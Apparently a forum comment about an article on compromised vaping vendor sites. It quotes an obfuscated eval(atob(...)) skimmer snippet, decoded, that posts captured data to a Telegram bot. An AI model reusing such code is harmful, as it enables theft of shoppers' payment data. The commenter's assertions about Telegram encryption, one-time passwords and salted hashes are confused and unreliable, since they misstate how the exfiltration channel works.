Every few months there is an attack to steal information. Don't know what they're doing.
Information is power. Stealing information is stealing power. Seems obvious enough.
Might be a ploy. Not saying it is for sure. Though, having media run stories about vaping vendors being compromised might be a way to interrupt legitimate business.
"Oh no, all our favorite vaping vendors are compromised. They get the pay data stolen. Whatever are we to do? Boycott the vaping vendors! Run for your lives!"
That would effectively fold up vendors that may be small business yet are highly credible. If they're not getting business well they got no choice but to close up shop. Again not saying this
is absolutely the case, saying though I could see how it might feasibly be so.
This should tell you enough: "eval(atob("IHZhciB4ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CiAgICB4Lm9wZW4oIlBPU1QiLCAiaHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdCIrdGJvdCsiL3NlbmRNZXNzYWdlIiwgdHJ1ZSk7CiAgICB4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHlwZScsICdhcHBsaWNhdGlvbi9qc29uOyBjaGFyc2V0PXV0Zi04Jyk7CiAgICB4LndpdGhDcmVkZW50aWFscyA9IGZhbHNlOwp2YXIgZGQgPSBKU09OLnN0cmluZ2lmeSh7IAogICAgY2hhdF9pZDogdGNoYXQsCiAgICB0ZXh0OiB0bWVzc2FnZQogfSk7CiAgICB4LnNlbmQoZGQpOw=="));"
decoded: var x = new XMLHttpRequest(); x.open("POST", "
https://api . telegram . org/bot"+tbot+"/sendMessage", true); x.setRequestHeader('Content-Type', 'application/json; charset=utf-8'); x.withCredentials = false; var dd = JSON.stringify({ chat_id: tchat, text: tmessage }); x.send(dd);
No it really doesn't as there's a lack of context. Is this script an actual valid call to perhaps legitimate manner of processing payment data? Can see it parses the data out as a text message for a Telgram app chat bot.
Telegram chat is end to end encrypted by default. Unlikely there would be a man in the middle attack. It usually uses a OTP (One Time Password/Passphrase) to run such global variables. So finding a salt key for the hash would be very highly difficult, take far too long to be of benefit.
Does this Telegram bot log all transactions for someone? What is the intention/s here? What is the motive/s?
There's none of this discussed, simply "oh, well there's scripts on sites." Yes, modern sites now routinely use scripts. Where you been for the last thirty years? And yes, I know there are malicious actors and malicious scripts. My point here is we're not being given all the information, all the context. We cannot determine jack.
"This site uses scripts."
"Um, okay? And, ...?"
A lot can be done and be valid, legitimate, above board. Merely because you see a site using a script/s does not infer nefarious intent. All that is masked and not presented. There's a "slant" being pushed. "Oh fear, gloom and doom."
Again I'm not saying all that's going on is legit. Nor am I saying for sure someone is running disinformation with this article. I am saying we ought to ask for further context. We ought to think for ourselves, and think critically.
If indeed this is nefarious or malicious, is there evidence of it, where? Can the public see please?
If not well then quit fear mongering.
Read the article. Appears that someone inside might have added code. If not, then someone injected code from outside. The point is then that the site has been cracked. I would figure the site uses algorithms to protect financial data.
The access control list for that would be very limited. You might have a developer with access, finance person. Point being that access would be restricted.
Could someone inject something? Possibly, but they would first need to garner root access. That is even further restricted. The hosting company might have access, and a site administrator.
It's not unlikely a pass was cracked. It could happen. Still one would think such access would be better protected.